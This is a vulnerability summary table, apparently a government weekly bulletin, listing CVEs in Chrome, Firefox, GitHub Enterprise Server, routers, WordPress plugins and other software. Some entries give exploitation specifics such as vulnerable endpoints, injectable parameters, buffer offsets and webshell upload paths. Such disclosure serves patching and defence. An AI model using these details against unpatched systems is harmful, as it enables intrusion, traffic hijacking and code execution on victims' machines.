| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8004 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496189510 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 148.0.7778.96 allowed an attacker on the local network segment to bypass same origin policy via malicious network traffic. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8005 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496298665 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8006 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496373088 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8007 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496399759 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8008 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496426191 |
| Google--Chrome | Inappropriate implementation in Cast in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8009 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496555077 |
| Google--Chrome | Insufficient validation of untrusted input in SiteIsolation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8010 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496624084 |
| Google--Chrome | Insufficient policy enforcement in Search in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8011 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496626029 |
| Google--Chrome | Inappropriate implementation in MHTML in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8012 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496628298 |
| Google--Chrome | Insufficient validation of untrusted input in FedCM in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8013 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497427430 |
| Google--Chrome | Inappropriate implementation in Preload in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8014 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497490364 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8015 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497548558 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8016 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497695401 |
| Google--Chrome | Side-channel information leakage in Media in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8017 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497722578 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to potentially perform a sandbox escape via malicious network traffic. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8018 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498292657 |
| Google--Chrome | Insufficient policy enforcement in WebApp in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8019 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498353173 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8020 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498382925 |
| Google--Chrome | Script injection in UI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8021 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498417031 |
| Google--Chrome | Inappropriate implementation in MHTML in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted MHTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8022 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499194407 |
| GitHub--Enterprise Server | A server-side request forgery (SSRF) vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a different URL parser than the request library, enabling a crafted URL to pass validation while directing the request to an unintended host. Exploitation required network access to the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.16.18, 3.17.15, 3.18.9, 3.19.6, and 3.20.2. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-07 | not yet calculated | CVE-2026-8034 | https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.18 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.15 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.9 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.6 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.2 |
| Acer--PredatorSense V3 | PredatorSense versions 3.00.3136 to 3.00.3196 contain a Local Privilege Escalation (LPE) vulnerability. The program exposes a Windows Named Pipe that uses a custom protocol to invoke internal functions. However, this Named Pipe is misconfigured, allowing any authenticated local user to execute arbitrary code with NT AUTHORITY\SYSTEM privileges and to delete arbitrary files with SYSTEM privileges. By leveraging this, an attacker can execute arbitrary code on the target system with elevated privileges. | 2026-05-08 | not yet calculated | CVE-2026-8069 | https://community.acer.com/en/kb/articles/19652 |
| CashDro--CashDro 3 Administration Panel | Weak credentials in the CashDro 3 web administration panel, version 24.01.00.26, where the platform allows the use of numeric PINs for user authentication. The system supports the use of PIN-based credentials, maintaining compatibility with POS software integrations deployed since 2012. This could allow an attacker to easily perform a brute-force attack against a user and gain access by trying different PINs without the account being locked. Successful exploitation of this vulnerability could result in unauthorized access to confidential configuration settings, compromising the security of the system. | 2026-05-08 | not yet calculated | CVE-2026-8076 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cashdro-3 https://labs.itresit.es/2026/05/07/cashdro-vulnerabilities-from-pentest-to-stealing-money/ |
| CashDro--CashDro 3 Administration Panel | Lack of proper authorization implementation in the CashDro 3 web administration panel, version 24.01.00.26. The backend lacks authorization controls, leaving security entirely to the frontend. By modifying the binary string in the 'Permissions' field of the JSON response, an attacker could escalate privileges and gain full administrative access. This vulnerability allows all restrictions to be bypassed and completely compromises system management. | 2026-05-08 | not yet calculated | CVE-2026-8077 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cashdro-3 https://labs.itresit.es/2026/05/07/cashdro-vulnerabilities-from-pentest-to-stealing-money/ |
| misp--misp | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in misp allows Stored XSS. This issue affects MISP before 2.5.37. A stored cross-site scripting vulnerability exists in the template element attribute handling logic. The application accepted arbitrary values for the TemplateElementAttribute type and category fields without validating them against the known MISP attribute type and category definitions. An attacker with permission to create or modify template element attributes could store a crafted type value. This affects the old templating engine of MISP (no longer accessible in 2.5.37), which will be removed in 2.5.38. | 2026-05-07 | not yet calculated | CVE-2026-8080 | https://github.com/MISP/MISP/commit/62824e5ca0056d01b195f70466ea0d382cca06d0 |
| Mozilla--Firefox | Use-after-free in the DOM: Networking component. This vulnerability was fixed in Firefox 150.0.2, Firefox ESR 140.10.2, Firefox ESR 115.35.2, Thunderbird 150.0.2, and Thunderbird 140.10.2. | 2026-05-07 | not yet calculated | CVE-2026-8090 | https://bugzilla.mozilla.org/show_bug.cgi?id=2034352 https://www.mozilla.org/security/advisories/mfsa2026-40/ https://www.mozilla.org/security/advisories/mfsa2026-41/ https://www.mozilla.org/security/advisories/mfsa2026-42/ https://www.mozilla.org/security/advisories/mfsa2026-43/ https://www.mozilla.org/security/advisories/mfsa2026-44/ |
| Mozilla--Firefox | Incorrect boundary conditions in the Audio/Video: Playback component. This vulnerability was fixed in Firefox 150, Thunderbird 150, Firefox ESR 140.10.1, Thunderbird 140.10.1, and Firefox ESR 115.35.2. | 2026-05-07 | not yet calculated | CVE-2026-8091 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029301 https://www.mozilla.org/security/advisories/mfsa2026-30/ https://www.mozilla.org/security/advisories/mfsa2026-33/ https://www.mozilla.org/security/advisories/mfsa2026-36/ https://www.mozilla.org/security/advisories/mfsa2026-39/ https://www.mozilla.org/security/advisories/mfsa2026-42/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird ESR 140.10.1 and Thunderbird 150.0.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 150.0.2, Firefox ESR 140.10.2, Firefox ESR 115.35.2, Thunderbird 150.0.2, and Thunderbird 140.10.2. | 2026-05-07 | not yet calculated | CVE-2026-8092 | Memory safety bugs fixed in Thunderbird ESR 140.10.2 and Thunderbird 150.0.2 https://www.mozilla.org/security/advisories/mfsa2026-40/ https://www.mozilla.org/security/advisories/mfsa2026-41/ https://www.mozilla.org/security/advisories/mfsa2026-42/ https://www.mozilla.org/security/advisories/mfsa2026-43/ https://www.mozilla.org/security/advisories/mfsa2026-44/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird 150.0.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 150.0.2 and Thunderbird 150.0.2. | 2026-05-07 | not yet calculated | CVE-2026-8093 | Memory safety bugs fixed in Thunderbird 150.0.2 https://www.mozilla.org/security/advisories/mfsa2026-40/ https://www.mozilla.org/security/advisories/mfsa2026-43/ |
| Mozilla--Firefox | Other issue in the WebRTC component. This vulnerability was fixed in Firefox ESR 140.10.2 and Thunderbird 140.10.2. | 2026-05-07 | not yet calculated | CVE-2026-8094 | https://bugzilla.mozilla.org/show_bug.cgi?id=2035939 https://www.mozilla.org/security/advisories/mfsa2026-41/ https://www.mozilla.org/security/advisories/mfsa2026-44/ |
| GitHub--Enterprise Server | A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirect_to query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an attacker to inject a form element that could capture administrator credentials. Exploitation required an administrator to click a crafted link and enter their credentials. This vulnerability affected GitHub Enterprise Server versions 3.19.1 through 3.19.5 and 3.20.0 through 3.20.1, and was fixed in versions 3.19.6 and 3.20.2. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-07 | not yet calculated | CVE-2026-8106 | https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.6 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.2 |
| CERT/CC--VINCE | VINCE versions 3.0.38 and earlier do not properly verify the From address authenticity due to encoding confusion and use the from address for automated actions such as Ticket creation or Ticket updates. | 2026-05-07 | not yet calculated | CVE-2026-8142 | https://kb.cert.org/vince https://github.com/CERTCC/VINCE |
| NAVER--NAVER MYBOX Explorer | NAVER MYBOX Explorer for Windows before 3.0.11.160 allows a local attacker to escalate privileges to NT AUTHORITY\SYSTEM via registry manipulation due to improper privilege checks. | 2026-05-08 | not yet calculated | CVE-2026-8148 | https://cve.naver.com/detail/cve-2026-8148.html |
| Legion of the Bouncy Castle Inc.--BC-FJA | A vulnerability in Legion of the Bouncy Castle Inc. BC-FJA BC-FIPS on Linux, X86_64, AVX, AVX-512f. This vulnerability is associated with program files gcm128w, gcm512w. This issue affects BC-FJA: from 2.1.0 through 2.1.2. | 2026-05-08 | not yet calculated | CVE-2026-8149 | https://do-not-publish.bouncycastle.org/do_not_publish |
| SHLOMIF--XML::LibXML | XML::LibXML versions through 2.0210 for Perl read out-of-bounds heap memory when parsing XML node names containing truncated UTF-8 byte sequences. A node name ending in the middle of a multi-byte UTF-8 sequence causes the parser to read past the end of the input string into adjacent heap memory. Any Perl process that passes attacker-controlled strings to XML::LibXML's DOM node-name methods can reach this path on the default API. The likely consequence is a crash, causing denial of service. | 2026-05-10 | not yet calculated | CVE-2026-8177 | https://github.com/cpan-authors/XML-LibXML/issues/146 https://github.com/cpan-authors/XML-LibXML/pull/149 https://github.com/cpan-authors/XML-LibXML/commit/15652bd905a6c9dda59a81b14d4766adbbae2ea8.patch |
| gibbonedu--gibbon | Gibbon versions before v30.0.01 are affected by an authenticated SQL Injection vulnerability by abusing the Tracking/graphing https://github.com/GibbonEdu/core/blob/c431e25fdc874adece5d2dc7e408e9aa2d1abadb/modules/Tracking/graphing.php#L145 feature. Successful exploitation requires Teacher or higher privileges. Exploitation could result in unintended read/write activities to the underlying database. | 2026-05-09 | not yet calculated | CVE-2026-8207 | https://projectblack.io/blog/gibbon-v30-authenticated-sql-injection-and-rce/#sql-injectiongetting-warmed-up https://github.com/GibbonEdu/core/releases/tag/v30.0.01 |
| gibbonedu--gibbon | Gibbon versions before v30.0.01 are affected by a local file inclusion vulnerability resulting in RCE by changing the report archive directory and forcing interpretation of a user provided .zip as PHP. Successful exploitation requires Teacher or higher privileges. Exploitation could result in compromise of the underlying web server. | 2026-05-09 | not yet calculated | CVE-2026-8208 | https://projectblack.io/blog/gibbon-v30-authenticated-sql-injection-and-rce/#local-file-inclusionthe-next-shiny-new-thing https://github.com/GibbonEdu/core/releases/tag/v30.0.01 |
| gibbonedu--gibbon | Gibbon versions before v30.0.01 are affected by a path traversal vulnerability resulting in denial of service (DoS): attempting extraction of web application PHP files fails, and the failed .zip extraction deletes the file, leaving the application in a DoS condition. Successful exploitation requires Teacher or higher privileges. Exploitation could result in loss of availability of the web application. | 2026-05-09 | not yet calculated | CVE-2026-8209 | https://github.com/GibbonEdu/core/releases/tag/v30.0.01 https://projectblack.io/blog/gibbon-v30-authenticated-sql-injection-and-rce/#denial-of-service-via-path-traversal |
Vulnerability Summary for the Week of April 27, 2026
Posted on Wednesday May 06, 2026
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| n/a--OVMS3 3.3.005 | Buffer overflow vulnerability in Open Vehicle Monitoring System 3 (OVMS3) 3.3.005. In canformat_gvret.cpp, the length field in GVRET binary data is not properly validated, allowing remote attackers to cause a denial of service or possibly execute arbitrary code via crafted GVRET frames. | 2026-05-01 | 10 | CVE-2026-37541 | https://github.com/openvehicles/Open-Vehicle-Monitoring-System-3 https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| tendacn[.]com--W308R | Tenda W308R v2 V5.07.48 contains a cookie session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient session validation. Attackers can send GET requests to the goform/AdvSetDns endpoint with a crafted admin language cookie to change DNS servers and redirect user traffic to malicious sites. | 2026-04-29 | 9.8 | CVE-2018-25316 | ExploitDB-44373 VulnCheck Advisory: Tenda W308R v2 V5.07.48 Cookie Session Weakness DNS Change |
| tendacn[.]com--W3002R | Tenda W3002R/A302/W309R wireless routers version V5.07.64_en contain a cookie session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient session validation. Attackers can send GET requests to the /goform/AdvSetDns endpoint with a crafted admin language cookie to change primary and secondary DNS servers, redirecting user traffic to malicious DNS servers. | 2026-04-29 | 9.8 | CVE-2018-25317 | ExploitDB-44380 VulnCheck Advisory: Tenda W3002R/A302/W309R V5.07.64_en Cookie Session Weakness DNS Change |
| tendacn[.]com--FH303/A300 | Tenda FH303/A300 firmware V5.07.68_EN contains a session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient cookie validation. Attackers can send GET requests to the /goform/AdvSetDns endpoint with a crafted admin cookie to change DNS servers and redirect user traffic to malicious sites. | 2026-04-29 | 9.8 | CVE-2018-25318 | ExploitDB-44381 VulnCheck Advisory: Tenda FH303/A300 V5.07.68_EN Cookie Session Weakness DNS Change |
| Weaver Network Co., Ltd.--E-office | Weaver (Fanwei) E-office versions prior to 10.0_20221201 contain an unauthenticated arbitrary file upload vulnerability in the OfficeServer.php endpoint that allows remote attackers to upload malicious files by sending multipart POST requests with arbitrary filenames and disguised content types. Attackers can upload PHP webshells to the Document directory and execute them via HTTP GET requests to achieve remote code execution as the web server user. Exploitation evidence was first observed by the Shadowserver Foundation on 2022-10-10 (UTC). | 2026-04-30 | 9.8 | CVE-2022-50993 | https://service.e-office.cn/knowledge/detail/5 https://cn-sec.com/archives/1453025.html https://bbs.chaitin.cn/topic/37 https://www.vulncheck.com/advisories/weaver-e-office-10-0-20221201-unauthenticated-arbitrary-file-read-via-xmlrpcservlet |
| synway[.]net--SMG Gateway Management | Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius.php where the radius_address POST parameter is split and interpolated directly into a sed command without sanitization. An unauthenticated remote attacker can inject arbitrary shell commands by submitting a POST request with crafted radius_address, radius_address2, shared_secret2, source_ip, timeout, or retry parameters along with save=1 and enable_radius=1 to achieve remote code execution. Exploitation evidence was first observed by the Shadowserver Foundation on 2025-07-11 (UTC). | 2026-04-30 | 9.8 | CVE-2025-71284 | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/synway/synwaysmg-radius-rce.yaml https://mrxn.net/jswz/synway-9-2radius-rce.html https://mp.weixin.qq.com/s/PyepoFSuQ63E3RnpQa9nsA https://www.synway.net/ https://www.vulncheck.com/advisories/synway-smg-gateway-management-software-os-command-injection-via-radius-address |
| Directorist Booking--Directorist Booking | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Directorist Booking allows SQL Injection. This issue affects Directorist Booking: from n/a before 3.0.2. | 2026-04-27 | 9.3 | CVE-2026-22336 | https://patchstack.com/database/wordpress/plugin/directorist-booking/vulnerability/wordpress-directorist-booking-plugin-2-4-1-sql-injection-vulnerability?_s_id=cve |
| Directorist--Directorist Social Login | Incorrect Privilege Assignment vulnerability in Directorist Directorist Social Login allows Privilege Escalation. This issue affects Directorist Social Login: from n/a before 2.1.4. | 2026-04-27 | 9.8 | CVE-2026-22337 | https://patchstack.com/database/wordpress/plugin/directorist-social-login/vulnerability/wordpress-directorist-social-login-plugin-2-1-1-privilege-escalation-vulnerability?_s_id=cve |
| Milesight--MS-Cxx63-PD | Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys. | 2026-04-27 | 9.8 | CVE-2026-32644 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-113-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-03.json https://www.milesight.com/support/download/firmware |
| n/a--Automotive Grade Linux (AGL) | AGL app-framework-main through 17.1.12 contains a Zip Slip path traversal vulnerability (CWE-22) combined with a TOCTOU race condition (CWE-367) in the widget installation flow. The is_valid_filename function in wgtpkg-zip.c validates ZIP entry names but does not check for dot notation directory traversal sequences; it only blocks absolute paths. The zread extraction function uses openat(workdirfd, filename, O_CREAT), which resolves dot notation values relative to the work directory, allowing files to be written anywhere on the filesystem. Critically, in function install_widget in file wgtpkg-install.c, extraction via zread occurs BEFORE signature verification via check_all_signatures. Even if signature verification fails, the error cleanup (remove_workdir) only deletes the temporary work directory; files written outside it via path traversal persist permanently. | 2026-05-01 | 9.8 | CVE-2026-37531 | https://gerrit.automotivelinux.org/gerrit/src/app-framework-main https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a--cannelloni v2.0.0 | Buffer overflow vulnerability in cannelloni v2.0.0 in CAN frame parsing, in parser.cpp in function parseCANFrame and in decoder.cpp in function decodeFrame, allowing remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via crafted CAN FD frames. | 2026-05-01 | 9.8 | CVE-2026-37539 | https://github.com/mguentner/cannelloni https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| Carlson Software--VASCO-B GNSS Receiver | The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials. | 2026-04-28 | 9.4 | CVE-2026-3893 | https://www.carlsonsw.com/support-and-training/ https://www.cve.org/CVERecord?id=CVE-2026-3893 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-02.json |
| Mersenne--Prime95 | Prime95 29.4b8 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting structured exception handling (SEH) mechanisms. Attackers can inject malicious payload through the optional proxy hostname field in the PrimeNet connection settings to trigger the overflow and execute system commands. | 2026-04-29 | 8.4 | CVE-2018-25299 | ExploitDB-44649 Official Product Homepage Product Reference VulnCheck Advisory: Prime95 29.4b8 Local Buffer Overflow via SEH |
| xataboost--XATABoost CMS | XATABoost CMS 1.0.0 contains a union-based SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the id parameter. Attackers can send GET requests to news.php with malicious id values to extract sensitive database information. | 2026-04-29 | 8.2 | CVE-2018-25300 | ExploitDB-44622 Official Product Homepage VulnCheck Advisory: XATABoost CMS 1.0.0 SQL Injection via news.php |
| Easy MPEG--Easy MPEG to DVD Burner | Easy MPEG to DVD Burner 1.7.11 contains a structured exception handling (SEH) local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious username string. Attackers can craft a payload containing junk data, SEH chain pointers, and shellcode that overwrites the SEH handler to redirect execution and run arbitrary commands like opening calc.exe. | 2026-04-29 | 8.4 | CVE-2018-25301 | ExploitDB-44565 Product Reference VulnCheck Advisory: Easy MPEG to DVD Burner 1.7.11 SEH Local Buffer Overflow |
| Alloksoft--Allok Video to DVD Burner | Allok Video to DVD Burner 2.6.1217 contains a stack-based buffer overflow vulnerability in the License Name field that allows local attackers to execute arbitrary code by triggering a structured exception handler (SEH) overwrite. Attackers can craft a malicious input string with 780 bytes of junk data followed by SEH chain pointers and shellcode, then paste it into the License Name field during registration to achieve code execution. | 2026-04-29 | 8.4 | CVE-2018-25303 | ExploitDB-44518 Official Product Homepage VulnCheck Advisory: Allok Video to DVD Burner 2.6.1217 Buffer Overflow SEH |
| Filehippo--Free Download Manager | Free Download Manager 2.0 Built 417 contains a local buffer overflow vulnerability in the URL import functionality that allows attackers to trigger a structured exception handler (SEH) chain exploitation. Attackers can craft a malicious URL file that, when imported through the File > Import > Import lists of downloads menu, causes a buffer overflow in the Location header response that overwrites the SEH chain and executes arbitrary code. | 2026-04-29 | 8.4 | CVE-2018-25304 | ExploitDB-44499 Product Reference VulnCheck Advisory: Free Download Manager 2.0 Built 417 Local Buffer Overflow SEH |
| Sysgauge--SysGauge Pro | SysGauge Pro 4.6.12 contains a local buffer overflow vulnerability in the Register function that allows local attackers to overwrite the structured exception handler by supplying a crafted unlock key. Attackers can inject shellcode through the Unlock Key field during registration to execute arbitrary code with application privileges. | 2026-04-29 | 8.4 | CVE-2018-25307 | ExploitDB-44455 VulnCheck Advisory: SysGauge Pro 4.6.12 Local Buffer Overflow SEH |
| donmik--Buddypress Xprofile Custom Fields Type | BuddyPress Xprofile Custom Fields Type 2.6.3 contains a remote code execution vulnerability that allows authenticated users to delete arbitrary files by manipulating unescaped POST parameters. Attackers can modify the field_hiddenfile and field_deleteimg parameters during profile editing to unlink files from the server. | 2026-04-29 | 8.8 | CVE-2018-25308 | ExploitDB-44432 Official Product Homepage VulnCheck Advisory: BuddyPress Xprofile Custom Fields Type 2.6.3 Remote Code Execution |
| Alloksoft--WMV to AVI MPEG DVD WMV Converter | Allok soft WMV to AVI MPEG DVD WMV Converter 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized string in the License Name field. Attackers can craft a malicious input containing shellcode with structured exception handler (SEH) overwrite to bypass protections and execute code with application privileges. | 2026-04-29 | 8.4 | CVE-2018-25314 | ExploitDB-44365 Official Product Homepage Product Reference VulnCheck Advisory: Allok soft WMV to AVI MPEG DVD WMV Converter 4.6.1217 Buffer Overflow |
| Alloksoft--Video Joiner | Alloksoft Video joiner 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Attackers can craft a payload with structured exception handler (SEH) overwrite and shellcode to achieve code execution when the application processes the license registration input. | 2026-04-29 | 8.4 | CVE-2018-25315 | ExploitDB-44364 Official Product Homepage Product Reference VulnCheck Advisory: Alloksoft Video joiner 4.6.1217 Buffer Overflow via License Name |
| marketingfire--Widget Options Advanced Conditional Visibility for Gutenberg Blocks & Classic Widgets | The Widget Options - Advanced Conditional Visibility for Gutenberg Blocks & Classic Widgets plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.2.2 via the Display Logic feature. This is due to the plugin using eval() on user-supplied Display Logic expressions with an insufficient blocklist/allowlist that can be bypassed using array_map with string concatenation, combined with a lack of authorization enforcement on the extended_widget_opts_block attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. The vulnerability was partially patched in version 4.2.0. | 2026-05-02 | 8.8 | CVE-2026-2052 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68023557-fc92-4cf6-96b4-405ff5a5fd5a?source=cve https://plugins.trac.wordpress.org/browser/widget-options/trunk/includes/widgets/gutenberg/gutenberg-toolbar.php#L843 https://plugins.trac.wordpress.org/browser/widget-options/trunk/includes/extras.php#L495 https://plugins.trac.wordpress.org/browser/widget-options/trunk/includes/extras.php#L534 https://plugins.trac.wordpress.org/changeset/3481338/ https://plugins.trac.wordpress.org/changeset/3514411/ |
| Milesight--MS-Cxx63-PD | An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras. | 2026-04-27 | 8.8 | CVE-2026-20766 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-113-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-03.json https://www.milesight.com/support/download/firmware |
| wclovers--WCFM Frontend Manager for WooCommerce | The WCFM - Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the 'wcfm_delete_wcfm_customer' due to missing validation on the 'customerid' user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators. | 2026-05-02 | 8.1 | CVE-2026-2554 | https://www.wordfence.com/threat-intel/vulnerabilities/id/21e397a4-0b32-4b13-a46b-c465acea0796?source=cve https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-customer.php#L386 https://plugins.trac.wordpress.org/changeset/3483695/ |
